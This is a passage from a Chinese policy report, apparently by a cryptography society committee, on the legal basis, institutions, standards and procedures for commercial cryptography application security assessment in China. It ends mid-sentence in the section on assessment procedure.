在数字经济时代, 密码作为国家重要战略资源, 广泛应用于国民经济发展和社会生产生活的方方面面, 涵盖金融和通信、公安、税务、社保、交通、卫生健康、能源、电子政务等重要领域,是保障网络与信息安 全的核心技术和基础支撑。在推动数字经济高质量发展、推进中国式现代的进程中,如何更好地规范商用密 码应用和管理、发挥密码在保障网络安全中的核心支撑作用至关重要。商用密码应用安全性评估作为验证密 码应用科学性的有效手段和方法,既是应对网络安全严峻形势的迫切需要,也是落实国家重要领域和关键行 业网络安全防护责任的有效手段,更是全面贯彻落实《中华人民共和国密码法》(以下简称《密码法》)和 《商用密码管理条例》基本要求、推进商用密码法治建设的重要举措。 密码应用涉及密码算法、技术、产品、服务、密钥管理等多个方面。在当前密码应用实践中, 由于密码 专业技术人员保障不足,密码应用要求理解把握不到位,密码错用、误用情况经常发生。商用密码应用安全 性评估依据科学全面的测评标准,由专业的技术人员采用专业的技术手段和测评工具,科学直观地对信息系 统密码应用情况给出评价,发现信息系统密码应用存在的不规范、不安全、不正确等问题,给出专业、可行 的意见建议, 为网络运营者掌握系统密码应用情况并进一步开展密码应用改造提供支撑, 有效规范密码应用, 提升网络安全保障水平。 中国密码学会密评联委会 1 密评相关政策法规要求 商用密码应用安全性评估(以下简称密评) 是指按照有关法律法规和标准规范, 对网络与信息系统使用 商用密码技术、产品和服务的合规性、正确性、有效性进行检测分析和评估验证的活动 1 。密评是衡量与改 进网络与信息系统密码保障水平的关键技术措施,对密码应用的助力推动和网络安全的兜底保障作用突出。 我国立足国情将密评相关工作要求纳入顶层设计,出台法律法规、政策文件,推动密评体系不断完善,密评 工作进入新发展阶段。 1.1 国家法律法规布局密评顶层设计 我国充分适应新时代商用密码事业发展需要, 坚持密评的立法、司法、执法和守法协同推进, 通过法律 法规明确密评的重要定位、评估范围、责任主体和评估要求等深刻内涵,推动密评在重要领域和关键环节加 速推广普及,为数字经济高质量发展提供基础支撑。 表 1 密评相关法律法规要求 法律法规 主要要求 《密码法》 第二十七条 法律、行政法规和国家有关规定要求使用商用密码进行保护的关键信息基础设施, 其运营者应当使用商用密码进行保护,自行或者委托商用密码检测机构开展商用密码应用安全 性评估。商用密码应用安全性评估应当与关键信息基础设施安全检测评估、网络安全等级测评 制度相衔接,避免重复评估、测评。 《商用密码管理 条例》(2023 年 7 月 1 日施行) 第三十八条 法律、行政法规和国家有关规定要求使用商用密码进行保护的关键信息基础设施, 其运营者应当使用商用密码进行保护,制定商用密码应用方案,配备必要的资金和专业人员, 同步规划、同步建设、同步运行商用密码保障系统,自行或者委托商用密码检测机构开展商用 密码应用安全性评估。 前款所列关键信息基础设施通过商用密码应用安全性评估方可投入运行,运行后每年至少 进行一次评估,评估情况按照国家有关规定报送国家密码管理部门或者关键信息基础设施所在 地省、自治区、直辖市密码管理部门备案。 第四十一条 网络运营者应当按照国家网络安全等级保护制度要求,使用商用密码保护网络安 全。国家密码管理部门根据网络的安全保护等级,确定商用密码的使用、管理和应用安全性评 估要求,制定网络安全等级保护密码标准规范。 第四十二条 商用密码应用安全性评估、关键信息基础设施安全检测评估、网络安全等级测评 应当加强衔接,避免重复评估、测评。 1 《商用密码应用安全性评估管理办法(征求意见稿)》, http://sca.gov.cn/sca/hdjl/2023-06/09/content_ 1061072.shtml 商用密码应 2023 法律法规 主要要求 《关键信息基础 设施安全保护条 例》 第五十条 关键信息基础设施中的密码使用和管理,还应当遵守相关法律、行政法规的规定。 《网络安全等级 保护条例(征求 意见稿)》 第四十七条 非涉密网络应当按照国家密码管理法律法规和标准的要求,使用密码技术、产品和 服务。第三级以上网络应当采用密码保护,并使用国家密码管理部门认可的密码技术、产品和 服务。 第三级以上网络运营者应在网络规划、建设和运行阶段,按照密码应用安全性评估管理办 法和相关标准,委托密码应用安全性测评机构开展密码应用安全性评估。网络通过评估后,方 可上线运行,并在投入运行后,每年至少组织一次评估。密码应用安全性评估结果应当报受理 备案的公安机关和所在地设区市的密码管理部门备案。 《密码法》明确关键信息基础设施运营者作为第一责任人, 应使用商用密码对关键信息基础设施进行保 护,自行或者委托商用密码检测机构开展商用密码应用安全性评估。 《商用密码管理条例》进一步细化了关键信息基础设施商用密码应用与安全性评估要求, 明确关键信息 基础设施应在规划、建设等必要阶段进行评估,投入运行后,还应当定期开展评估。同时, 《商用密码管理 条例》明确,网络运营者应当按照国家网络安全等级保护制度要求,使用商用密码保护网络安全。网络安全 等级保护制度中的商用密码使用、管理和应用安全性评估要求重点适用对象是第三级以上网络,凸显了对网 络安全等级保护三级以上网络加强商用密码应用安全性评估工作、落实商用密码应用相关要求的迫切需要。 《关键信息基础设施安全保护条例》明确, 关键信息基础设施中的密码使用和管理, 还应当遵守相关法 律、行政法规的规定。这对使用密码技术保护关键信息基础设施安全提出了原则性要求。 《网络安全等级保护条例(征求意见稿) 》第五章中明确提出密码配备使用、管理和应用安全性评估的 有关要求,对网络的密码保护作出规定。其中,对非涉密网络、第三级以上网络提出密码保护要求,明确规 定网络运营者应在网络规划、建设和运行阶段委托专业测评机构开展密码应用安全性评估,并对评估结果备 案提出了要求 2。 1.2 国家多项政策文件为密评实施提供指引 面对新时代全球安全形势及发展需求, 我国统筹发展与安全, 出台了多项政策文件对密评进行整体性制 度安排,推动密评体系健全完善。密评相关国家政策文件要求如表 2 所示,更多国家层面密码应用及密评相 关政策文件详见附录 1.2。 2 《网络安全等级保护条例(征求意见稿)》解读, https://www.secrss.com/articles/5005 中国密码学会密评联委会 表 2 密评相关国家政策文件要求 文件名称 密评相关工作要求 密码应用与创新发展相关工作规划 全面提升密码基础支撑能力,完善密码应用安全性评估审查机制。 《“十四五”数字经济发展规划》 加强网络安全等级保护和密码应用安全性评估。 《国家政务信息化项目建设管理办法》 (国办发〔2019〕57 号) 项目建设单位应当落实国家密码管理有关法律法规和标准规范的要求,同步 规划、同步建设、同步运行密码保障系统并定期进行评估。 《国务院关于加强数字政府建设的指 导意见》(国发〔2022〕14 号) 建立健全网络安全、保密监测预警和密码应用安全性评估的机制。 1.3 有关部门出台指导性及规范性文件落实密评要求 据不完全统计, 国家密码管理局、中央网信办、教育部、工业和信息化部、公安部、财政部、交通运输部、 国家能源局、国家邮政局等部门出台多项密评政策文件,明确金融、政务、教育、工信、交通、能源等行业 商用密码应用安全性评估工作要求,提升商用密码应用和管理水平,深化商用密码在各行业或领域的应用。 密评相关行业政策文件要求如表 3 所示,更多各部门密码应用及密评相关政策文件详见附录 1.3。 表 3 密评相关行业政策文件要求 有关部门 文件名称 密评相关内容 国家密码管理局、中央 网信办、国家发展改革 委、科技部、工业和信 息化部、公安部、财政部、 国务院国资委、市场监 管总局、证监会 促进商用密码产业高质量发展相 关文件 依法督促建设密码保障体系,并强化重要网络与信息 系统商用密码应用安全性评估的执法检查。 教育部 《2020 年教育信息化和网络 安全工作要点》(教科技厅〔 2020〕1 号) 有序推动教育重要业务信息系统开展密码应用安全性 评估,推动国家教育管理信息系统密码普遍应用,提 升系统安全和数据安全。 工业和信息化部 《关于加强车联网网络安全和数 据安全工作的通知》(工信部网 安〔2021〕134 号) 认定为关键信息基础设施的,要按照国家有关标准使 用商用密码进行保护,自行或者委托商用密码检测机 构开展商用密码应用安全性评估。 公安部 《贯彻落实网络安全等级保护制 度和关键信息基础设施安全保 护制度的指导意见》(公网安〔 2020〕1960 号) 第三级以上网络运营者应在网络规划、建设和运行阶 段,按照密码应用安全性评估管理办法和相关标准, 在网络安全等级测评中同步开展密码应用安全性评估。 财政部 《政务信息系统政府采购管理暂 行办法》(财库〔2017〕210 号) 采购需求应当落实国家密码管理有关法律法规、政策 和标准规范的要求,同步规划、同步建设、同步运行 密码保障系统并定期进行评估。 商用密码应 2023 有关部门 文件名称 密评相关内容 交通运输部 《公路水路关键信息基础设施安 全保护管理办法》 法律、行政法规和国家有关规定要求使用商用密码进 行保护的公路水路关键信息基础设施,其运营者应当 使用商用密码进行保护,自行或者委托商用密码检测 机构每年至少开展一次商用密码应用安全性评估。 商用密码应用安全性评估应当与公路水路关键信息基 础设施安全检测评估、网络安全等级测评制度相衔接, 避免重复评估、测评。 国家能源局 《关于印发〈电力行业网络安全 管理办法〉的通知》(国能发安 全规〔2022〕100 号) 电力企业应当按照国家有关规定开展商用密码应用安 全性评估等工作,未达到要求的应当及时进行整改。 国家邮政局、国家发展 改革委、交通运输部 《“十四五”邮政业发展规划》 在网络建设和运营过程中,同步规划、建设、使用有 关安全保护措施,严格落实国家关于等保、关保、密 评等有关要求。 1.4 相关地区积极将密评要求纳入地方政策制度 据不完全统计, 我国各省(自治区、直辖市) 及新疆生产建设兵团共出台 130 余项密码应用及密评相关 政策文件,针对性提出适应地方特点的信息系统商用密码应用工作要求,推进商用密码应用及安全性评估工 作,切实提升信息系统的安全性和密码应用合规性。各省(自治区、直辖市)及新疆生产建设兵团密码应用 及密评相关政策详见附录 1.4。 2 密评体系建设进展 2017 年 4 月,国家密码管理局印发《关于开展密码应用安全性评估试点工作的通知》(国密局字〔 2017 〕138 号),附《商用密码应用安全性评估管理办法(试行)》,开始开展商用密码应用安全性评估试 点及机构培育工作。 2017 年 9 月, 国家密码管理局印发《商用密码应用安全性测评机构管理办法(试行) 》 等文件,密评制度体系初步建立。2019 年 4 月,为支撑密评各项工作开展,中国密码学会设立商用密码应 用安全性评估联合委员会(以下简称密评联委会) ,聚焦密评人才队伍教育与培训、密评相关标准制定、密 评技术评价和能力评估、密评关键共性技术研究、密评行业发展促进等重点工作。2021 年 11 月,国家密码 管理局印发《关于规范商用密码应用安全性评估结果备案工作的通知》(国密局字〔2021〕392 号),明确 中国密码学会密评联委会 规范商用密码应用安全性评估结果备案相关要求, 密评体系进一步规范。 2023 年 7 月, 《商用密码管理条例》 正式施行,设立专章推进商用密码检测认证体系建设,密评体系逐步走向完善。 2.1 密评工作机制 密评工作主要涉及的主体有密码管理部门、行业主管部门、商用密码应用安全性评估机构(以下简称密 评机构) 、网络运营者以及密评联委会等。按照《商用密码管理条例》《商用密码应用安全性评估管理办法 (征求意见稿) 》《商用密码检测机构管理办法(征求意见稿) 》《关于规范商用密码应用安全性评估结果 备案工作的通知》(国密局字〔2021〕392 号)、《关于进一步规范商用密码应用安全性评估试点工作的通知》 (国密局字〔 2022〕454 号)等法规文件要求,以上各主体在密评工作中的职责如下。 2.1.1 国家密码管理部门负责管理全国的商用密码工作 一是负责和有关部门建立商用密码监督管理协作机制, 加强商用密码监督、检查、指导等工作的协调配合。 二是负责全国商用密码检测机构的资质认定和监督管理;负责管理全国的商用密码应用安全性评估工作。 三是规范商用密码应用安全性评估结果备案工作, 并对密评结果备案材料进行季度抽查并组织开展技术 复核,定期通报各地区密评结果备案材料形式审查工作成效和技术复核结果。 2.1.2 地方各级密码管理部门负责管理本行政区域的商用密码工作 一是县级以上地方各级密码管理部门负责本行政区域内商用密码检测机构的监督管理;负责管理本行政 区域的商用密码应用安全性评估工作。 二是县级以上地方各级密码管理部门负责督促本地区有关网络运营者同步规划、同步建设、同步运行商 用密码保障系统,规范开展密评工作。 三是各省、自治区、直辖市密码管理部门负责指导本地区有关网络运营者履行备案程序, 并对备案材料 进行形式审查;按季度向国家密码管理局报送本地区商用密码应用安全性评估工作开展情况。 2.1.3 行业主管部门推动本行业本领域密码应用 一是和密码管理部门建立商用密码监督管理协作机制, 加强商用密码监督、检查、指导等工作的协调配 合,推进重要领域和行业商用密码应用。 二是在职责范围内负责指导、监督本机关、本单位或者本系统的商用密码应用安全性评估工作。 三是采取多种形式加强商用密码宣传教育,增强公民、法人和其他组织的密码安全意识。 2.1.4 密评机构开展商用密码应用安全性评估具体实施 密评机构是商用密码检测机构的一类, 从事商用密码应用安全性评估活动, 向社会出具具有证明作用的 商用密码应用安全性评估数据、结果。 商用密码应 2023 一是按照法律、行政法规和商用密码检测技术规范、规则, 在批准范围内独立、公正、科学、诚信地开 展商用密码检测,对出具的检测数据、结果负责。 二是对检测原始记录和检测报告归档留存, 保证其具有可追溯性。原始记录和检测报告的保存期限不得 少于 6 年。 三是于每年 1 月 15 日前通过所在地省、自治区、直辖市密码管理部门向国家密码管理局报送上一年度 工作报告以及相关统计数据。 四是积极配合密码管理部门的监督检查,如实提供相关材料和信息。 商用密码检测机构及相关从业人员应当按照法律法规、标准规范等要求开展检测活动, 遵循客观独立、 科学公正、诚实信用原则,尊重知识产权,恪守职业道德,承担社会责任,保守在工作中知悉的国家秘密、 商业秘密和个人隐私。 2.1.5 网络运营者履行密评主体责任 法律、行政法规和国家有关规定要求使用商用密码进行保护的关键信息基础设施、重要网络与信息系统, 其运营者应当使用商用密码进行保护,制定商用密码应用方案,配备必要的资金和专业人员,同步规划、同 步建设、同步运行商用密码保障系统,自行或者委托商用密码检测机构开展商用密码应用安全性评估。 一是在系统规划阶段, 网络运营者应当依照相关法律法规和标准规范, 根据商用密码应用需求, 制定商 用密码应用方案,规划商用密码保障系统。 自行或者委托商用密码检测机构对商用密码应用方案进行商用密码应用安全性评估。商用密码应用方案 未通过商用密码应用安全性评估的,不得作为商用密码保障系统的建设依据。 二是在系统建设阶段,网络运营者应当按照通过商用密码应用安全性评估的商用密码应用方案组织实 施,落实商用密码安全防护措施,建设商用密码保障系统。 系统运行前, 应当自行或者委托商用密码检测机构开展商用密码应用安全性评估。网络与信息系统未通 过商用密码应用安全性评估的,运营者应当进行改造,改造期间不得投入运行。 委托商用密码检测机构开展商用密码应用安全性评估的, 不得对评估结果施加影响, 并需提供如下支持: ( 1 )对网络与信息系统的重要数据进行备份; (2 )提供完整有效的网络与信息系统设备清单和网络拓扑; (3 )提供详细的网络与信息系统商用密码应用方案、密码相关管理制度和密码配置、运行、维护记录; (4 )提供商用密码产品管理入口、网络交换设备接入端口等相关信息、数据接入分析条件,并配合进 行数据采集; (5 )安排网络与信息系统相关网络管理员、系统管理员、商用密码产品管理员等做好配合; (6 )其他需要配合的事项。 三是系统建成运行后, 网络运营者应当自行或者委托商用密码检测机构每年至少开展一次商用密码应用 安全性评估,确保商用密码保障系统正确有效运行。未通过商用密码应用安全性评估的,运营者应当进行改 造,并在改造期间采取必要措施保证网络与信息系统运行安全。 四是网络运营者发现密码相关重大安全事件、重大密码安全隐患或者特殊紧急情况的, 应当及时向国家 中国密码学会密评联委会 密码管理局或者网络与信息系统所在地省、自治区、直辖市密码管理部门报告,必要时启动应急处置方案并 开展商用密码应用安全性评估。 网络运营者应当在商用密码应用安全性评估报告出具之日起 30 日内,将评估报告连同相关工作情况按照 国家有关规定报送国家密码管理局或者网络与信息系统所在地省、自治区、直辖市密码管理部门备案。 2.1.6 密评联委会支撑密评各项工作开展 商用密码领域的学会、行业协会等社会组织依照法律、行政法规及其章程的规定, 开展学术交流、政策 研究、公共服务等活动,加强学术和行业自律,推动诚信建设,促进行业健康发展。在国家密码管理局的指 导下,密评联委会全面支撑密评人才队伍教育与培训、标准制定、技术评价和能力评估、关键共性技术的研 究、密评行业促进等方面工作。 一是依托密码行业标准化技术委员会(以下简称密标委) ,推动商用密码应用与安全性评估标准规范制 定。规划设计密评标准体系, 提出标准编制需求、发布编制任务、征集编制单位、与密标委对接完成标准立项、 推进研制、质量把关、标准验证、标准修订等,以及标准配套指导性文件的跟踪研究及制修订工作。组织开 展标准宣贯、解读及相关培训、研讨活动, 主动了解行业密码应用需求, 推进行业相关标准制定或内容嵌入。 二是支撑密码管理部门建立密评机构能力验证体系, 完善配套流程机制, 明确密评机构能力综合评价和 理论考试、技能考核、报告质量评价等具体环节的方法与指标,并支持搭建密评能力验证实训环境。支撑密 码管理部门建立完善密评人员培训考核体系,开展密评人员水平评价。 三是推动密评行业自律建设及宣贯推广。负责制定并组织实施密评行业自律公约, 规范密评机构市场竞 争及密评过程行为等。建立密评行业信息收集、反馈、通报机制,促进行业信息公开,支撑建立密评行业信 息平台,加强密评工作信息发布与宣传推广。通过学术研讨、专题论坛、技术沙龙、专业讲座及知识竞赛等 方式,提升密评队伍的综合素养和专业能力,加强密评经验交流与创新研究。 2.2 密评机构培育 作为密评试点工作的重要内容, 机构培育与密评开展相辅相成, 日益壮大的密评队伍力量支撑着密评工 作的健康持续发展。国家密码管理局按照“总量控制、合理布局、择优选择”原则,采取“省部推荐、集中 考核”模式, 于 2017 年 4 月、2019 年 9 月分两批培育认定密评试点机构并进行分类管理, 其中 48 家纳入《商 用密码应用安全性评估试点机构目录》并面向社会公布, 可在全国范围内开展密评工作, 25 家准予在本地区、 本行业从事密评工作,覆盖全国 26 个省(自治区、直辖市)、 11 家部委或央企行业领域。 随着《商用密码管理条例》正式施行, 密评机构作为商用密码检测机构的一类, 具备了行政许可的基础。 国家密码管理局积极组织制修订《商用密码检测机构管理办法》《商用密码应用安全性评估管理办法》等配 套规章, 推动落实密评机构行政许可, 为密评依法管理提供基础。随着管理模式由试点资格向许可资质过渡, 密评机构层次范围、质量水平将得到进一步提升拓展。 商用密码应 2023 2.3 密评系列标准 自 2017 年密评试点工作启动以来,国家密码管理局持续加强密评标准规范供给。试点工作之初,研究 确定了密评体系总体架构,并组织有关单位起草 14 项制度文件,明确了密评体系建设、密评机构培育、密 评活动开展的基本依据。近年来,在国家密码管理局的指导下,相关标准化组织及密评联委会立足密评试点 工作实际,积极组织密评标准及指导性文件制修订工作,推动密评工作标准化建设,为密评活动有序开展搭 建标准化支撑基础。 2.3.1 密评系列标准框架 随着密评试点工作的深入, 密评系列标准不断完善。GM/T 0054-2018《信息系统密码应用基本要求》(以 下简称 GM/T 0054-2018)从行业标准上升为国家标准 GB/T 39786-2021 《信息安全技术 信息系统密码应用 基本要求》(以下简称 GB/T 39786-2021),为密评工作开展提供基础性指导。密码行业标准 GM/T 0115- 2021 《信息系统密码应用测评要求》(以下简称 GM/T 0115-2021)、GM/T 0116-2021 《信息系统密码应用 测评过程指南》(以下简称 GM/T 0116-2021)以及指导性文件《商用密码应用安全性评估量化评估规则》《信 息系统密码应用高风险判定指引》等相继发布, 规范了测评要求、测评过程、测评结果以及测评报告等内容。 截至目前, 已有 1 项商用密码应用与安全性评估相关国家标准发布、 2 项在研, 2 项相关密码行业标准发布、 4 项在研, 5 项指导性文件发布。 商用密码应用安全性评估相关标准经历了从无到有、不断优化的过程, 逐步构建了涵盖应用类、评估类 和管理类的密评系列标准框架(如图 1 所示) 。应用类标准指导信息系统商用密码应用,同时也是评判密码 应用是否合规的依据;评估类标准依据应用类标准制定,具体指导密评工作的开展;管理类标准是密评工作 的基础和保障。这些标准和指导性文件相互关联、相互支撑, 有力支撑了《密码法》和《商用密码管理条例》 的落地实施。 应用类 GB/T39786-2021 《信息安全技术 信息系统密码应用基本要求》 《信息安全技术信息系统 密码应用设计技术指南》 《信息系统密码应用实施 指南》 各行业密码应用相关标准规范 《商用密码应用安全性评估监督检查规范》 《商用密码应用安全性评估机构能力要求和评价规范》 图 1 密评系列标准示意图 – 9 – 中国密码学会密评联委会 2.3.2 密评系列标准主要内容 ( 1 )GB/T 39786-2021 为密评工作提供基础性指导 GB/T 39786-2021 用于指导、规范信息系统密码应用的规划、建设、运行及测评,是指导密评工作开展 的基础性标准。该标准规定了信息系统从第一级到第四级的密码应用的基本要求,从信息系统的物理和环境 安全、网络和通信安全、设备和计算安全、应用和数据安全四个方面提出了密码应用技术要求, 从管理制度、 人员管理、建设运行和应急处置四个方面提出了密码应用管理要求。在该标准的基础上,各领域与行业可结 合本领域与行业的密码应用需求来指导、规范信息系统密码应用。 同时,密评试点的具体实践和工作经验对 GB/T 39786-2021 的编制起到了积极的促进作用。2018 年 9 月 26 日,该标准项目组在国家密码管理局和全国信息安全标准化技术委员会 WG3 工作组的指导下,向全 国 27 家密评试点机构征求意见。2018 年 9 月到 10 月,该标准项目组根据 27 家密评试点机构的意见,对标 准进行了多次研讨,将身份鉴别、访问控制、数据完整性等部分条款进行调整与修改。来自真实应用场景 的密评试点实践成果有力支撑了 GB/T 39786-2021 的编制工作,相较于标准前身密码行业标准 GM/T 0054- 2018 ,国标 GB/T 39786-2021 的合理性和可操作性得到进一步提升。 (2 )密评相关标准及指导性文件有力支撑密评工作开展 近年来, 在国家密码管理部门的指导下, 我国陆续出台了一系列商用密码应用与安全性评估相关标准规 范与指导性文件,主要涉及信息系统密码应用设计、建设、测评等各工作环节的要求。密评系列标准包含应 用、评估及管理三类标准。 表 4 密评相关标准及指导性文件 类 别 标准及指导性 文件名称 状态 主要内容 应 用 类 《信息安全技术 信息系统密码应 用设计技术指南》 在研 包括信息系统密码应用框架、密码应用方案设计原则、密码应用方案设计过程和 密码应用方案设计指南,适用于指导信息系统密码应用方案的设计,也可作为信 息系统密码保障系统建设、密码应用安全性评估、密码管理部门密评备案工作的 参考。 《信息系统密码 应用实施指南》 在研 参照 GB/T 39786-2021 给出了信息系统密码应用的过程指导和建议, 描述了规划、 建设、运行及终止阶段的实施流程及主要活动,适用于指导信息系统密码应用的 实施。 评 估 类 GM/T 0115-2021 《信息系统密码 应用测评要求》 发布 规定了信息系统不同等级密码应用的测评要求,从密码算法、密码技术、密码产 品和密码服务合规性、密钥管理安全性方面,提出了第一级到第五级的密码应用 通用测评要求;从信息系统的物理和环境安全、网络和通信安全、设备和计算安 全、应用和数据安全等四个技术层面提出了第一级到第四级密码应用技术的测评 要求;从管理制度、人员管理、建设运行和应急处置等四个管理方面提出了第一 级到第四级密码应用管理的测评要求,并给出了整体测评、风险分析和评价、测 评结论等测评环节的要求。该标准适用于指导、规范信息系统在规划、建设、运 行环节的密评工作。该标准升国标的工作正在进行。 GM/T 0116-2021 《信息系统密码 应用测评过程指 南》 发布 规定了信息系统密码应用的测评过程。该标准在遵循测评的客观公正性原则、可 重用性原则、可重复性和可再现性原则及结果完善性原则的基础上,规范了各项 测评活动及其工作任务。 商用密码应 2023 类 别 标准及指导性 文件名称 状态 主要内容 评 估 类 《商用密码应用 安全性评估量化 评估规则》 发布 依据 GB/T 39786-2021 和 GM/T 0115-2021 对信息系统的密码应用情况给出定量评 估结果,适用于规范信息系统密码应用安全性评估,以及指导相关信息系统的规 划、建设等工作。该指导性文件结合当前密码应用推进的实际情况,鼓励网络运 营者使用密码技术,特别是使用合规的密码技术、产品和服务,并且优先在网络 和通信安全层面、应用和数据安全层面推进商用密码应用。 《信息系统密码 应用高风险判定 指引》 发布 给出了信息系统密码应用过程中可能存在的高风险安全问题,强调密评过程要按 照“综合判定、保住底线”的思路, 一定程度上既保证信息系统具备安全防护能 力, 又有利于促进信息系统的密码应用, 强调密码产品、密码服务自身的安全性, 引导网络运营者使用合规的密码产品和服务,防止因产品和服务问题给系统带来 新的风险。 《商用密码应用 安全性评估报告 模板》(2023 版) 发布 包括《商用密码应用安全性评估报告模板 (2023 版 )—方案密评报告》报告模板(以 下简称方案密评报告模板)和《商用密码应用安全性评估报告模板 (2023 版 )— 系统密评报告》模板(以下简称系统密评报告模板)。方案密评报告模板对信息 系统密码应用方案的密评报告格式进行了规范,系统密评报告模板对信息系统的 密评报告格式进行了规范。 《商用密码应 用安全性评估 FAQ》 发布 以问答形式解释了密评过程中常见的典型问题,为相关单位和从业人员开展密评 工作提供参考。确立了定期更新机制,不断应对技术发展和应用情况的变化,以 持续保持密评标准体系的活力。 《信息安全技术 信息系统密码应 用测评要求》 在研 根据 GB/T 39786-2021,将信息系统密码应用测评要求分为通用测评要求和密码 应用测评要求,规定了信息系统不同等级密码应用的测评要求,从密码算法、密 码技术、密码产品和密码服务合规性、密钥管理安全性方面,提出了第一级到第 五级的密码应用通用测评要求;适用于指导、规范信息系统密码应用在规划、建设、 运行环节的商用密码应用安全性评估工作。 管 理 类 《商用密码应用 安全性评估机构 能力要求和评价 规范》 在研 规定了密评机构的能力要求和评价规范。在密评机构能力要求方面,具体给出了 基本条件、组织管理要求、资源要求(人员、工作场所条件、设施与设备、分包等)、 风险控制能力要求、质量管理要求;在密评机构能力评价方面给出了评价流程、 初次评价、期间评价、能力复评等要求。 《商用密码应用 安全性评估监督 检查规范》 在研 规定了商用密码应用安全性评估监督检查工作的组织管理形式、监督检查对象、 检查工作内容和实施开展方式,为国家密码管理部门和省(市)密码管理部门对 辖内机构实施日常监督检查提供依据, 为重要领域网络和信息系统的建设、使用、 管理单位进行商用密码应用自查工作提供标准,为密评机构实施密评工作提供合 规性指导。 《信息系统密码 安全管理体系》 在研 参考 GB/T 22080《信息技术 安全技术 信息安全管理体系要求》,在 GB/T 39786- 2021 的基础上,结合国内密码应用安全管理和实践经验进行制定,为网络运营者 建立组织内部的密码应用安全管理体系提供指导。标准内容包括管理保障、密码 应用安全风险管理、密码应用安全控制、有效性测量、持续改进和密码应用安全 管理体系评估等。 2.3.3 密评标准的特点 在国家密码管理部门的指导下, 密评相关标准规范、指导性文件在规范密评活动的同时, 也在密评试点 过程中得到验证和完善。 中国密码学会密评联委会 一是注重与相关标准的衔接性与协调性。 《中华人民共和国密码法》第二十七条明确要求“商用密码应 用安全性评估应当与关键信息基础设施安全检测评估、网络安全等级测评制度相衔接, 避免重复评估、测评。” 密评相关标准在制修订过程中严格落实法律要求,并注重密评与关键信息基础设施安全检测评估、网络安全 等级测评工作衔接。以 GB/T 39786-2021 为例。 第一,GB/T 39786-2021 是商用密码应用安全性评估的基础性指导。GB/T 39786-2021 和 GB/T 22239- 2019 《信息安全技术 网络安全等级保护基本要求》(以下简称 GB/T 22239-2019)二者既相互补充,又可相 互独立实施。标准内容的合理设计, 有效避免了网络安全等级保护测评、密评工作在实施过程出现重复评估、 测评的情况。 第二,信息系统遵循的密码应用等级及范围参照网络安全等级保护定级。信息系统根据 GB/T 22240- 2020 《信息安全技术 网络安全等级保护定级指南》完成定级备案后,其密码应用等级及范围也相应确定。 从密评机构的视角看,信息系统完成等级保护定级是启动密评的基础,密评对象的范围与等级保护定级范围 保持一致,以减少密评对象等级不同所带来的复杂性。 第三, 在标准具体条款内容上, 注意与关键信息基础设施安全检测评估、网络安全等级测评相关标准规 范内容的一致性。例如,在 GB/T 22239-2019 中,对于等级保护第三级系统的数据完整性要求是“应采用校 验技术或密码技术”保障完整性,对于等级保护第四级系统提出“应采用密码技术”保障完整性。因此,在 GB/T 39786-2021 制定过程中,将对应行标 GM/T 0054-2018 《信息系统密码应用基本要求》第三级中对完整 性要求的约束程度由“应”调整为 GB/T 39786-2021 中的“宜”,第四级维持“应”的要求。 第四, GM/T 0115-2021 《信息系统密码应用测评要求》、GM/T 0116-2021 《信息系统密码应用测评过 程指南》是为配合 GB/T 39786-2021 的贯彻实施,更好地指导和规范密评工作而制定的两部行业标准,相关 标准规范制定中注意与现行法律、法规以及国家标准相衔接,保证标准规范内容的合规性。 二是标准制定具有科学性与可落地性。在密评试点推进伊始, 对信息系统密码应用安全性评估的结果判 定采用符合性判定“一票否决”的机制,但随着密评工作的推进,该机制的不适应性逐步显现。一方面,密 码应用推进工作难度大、周期长,“一票否决”不利于网络运营者统筹各方资源落实密码应用要求。另一方 面,密评机构在实施标准过程中,缺乏量化评分机制,评估过程和评估结果缺乏说服力。 结合密码应用推进工作实际, 《商用密码应用安全性评估量化评估规则》《信息系统密码应用高风险判 定指引》制定工作适时启动,目前以指导性文件的形式在实际工作中使用,起到了较好的规范和引领作用。 相比于原有“一票否决”的规则, “量化评估+风险判定”的综合判定思路完善了密评结果的出具过程。量 化评估是为了“保量”,即商用密码应用应当达到一定的程度, 便于纵向和横向的比较;风险判定是为了“保 质”,即守住信息系统的安全底线。 在风险可控前提下, 《商用密码应用安全性评估量化评估规则》对系统的密码应用情况给出科学的定量 评价指标,主要从密码使用有效性、密码算法 / 技术合规性、密钥管理安全三个方面量化评估。密码使用有 效性关注密码技术是否被正确、有效使用,以满足信息系统的安全需求。密码算法 / 技术合规性关注信息系 统使用的密码算法是否符合法律、行政法规、国家有关规定和密码相关国家标准、行业标准的要求,密码技 术是否遵循密码相关国家标准和行业标准或通过国家密码管理部门审查鉴定。密钥管理安全关注密钥管理的 全生命周期是否安全,用于密码计算或密钥管理的密码产品、密码服务是否安全。 商用密码应 2023 随着全社会密码应用保障系统的建设和能力的提高, 量化评估阈值也会随之进行调整。密码应用安全的 量化评估不仅有助于呈现密码应用推进的阶段性成果,而且为密码应用安全持续改进指明了方向。 三是标准制修订具备灵活性与适应性。密评活动离不开密码应用保障系统的建设情况, 制修订密评标准 规范既要保证一定的先进性, 又要结合实际情况, 确保标准规范真正起到指导密评活动正常有序开展的作用。 随着试点工作的不断推进,密评系列标准也在不断丰富和发展。 第一,在试点阶段, 为了更好地指导和规范密评机构开展密评工作, 密评联委会本着“共性先立、急用 先行”的原则,通过指导性文件的方式先行发布一些亟需规范。2020 年密评联委会发布《信息系统密码应 用测评要求》等 5 项商用密码应用与安全性评估指导性文件,之后,多次更新发布了《信息系统密码应用高 风险判定指引》《商用密码应用安全性评估量化评估规则》《商用密码应用安全性评估报告模板》等指导性 文件。 第二, 在密码行业标准层面积极推动密评标准制定, 同时, 对基础性的、需要在全国范围内统一的技术 要求,适时启动行标升国标或国标编制的工作,如 GB/T 39786-2021 《信息安全技术 信息系统密码应用基本 要求》、正在制定的国标《信息安全技术 信息系统密码应用测评要求》。 第三, 持续推进标准文件更新出台, 不断为密评标准注入生命力。一方面, 密码应用与安全性评估活动 越来越频繁,亟需规范的活动内容越来越多。另一方面,密码应用场景的不断丰富,对不同场景、不同行业 应用系统的密评工作带来了新的挑战。因此,需要积极归纳总结密评试点过程的宝贵经验,根据不同场景和 典型业务需求丰富完善相关标准内容。在后续工作中,结合试点实践情况,还需要进一步推进指导性文件加 快成熟,并适时制定发布相应的标准文件,以更好地指导商用密码应用与安全性评估工作。 2.4 密评程序 密评开展程序如图 2 所示, 在系统规划阶段、建设阶段、运行阶段, 网络运营者和密评机构需紧密配合, 完成密码应用方案评估和信息系统密评工作,并将评估结果报密码管理部门备案。 在系统的规划阶段, 网络运营者应当依照相关法律法规和标准规范, 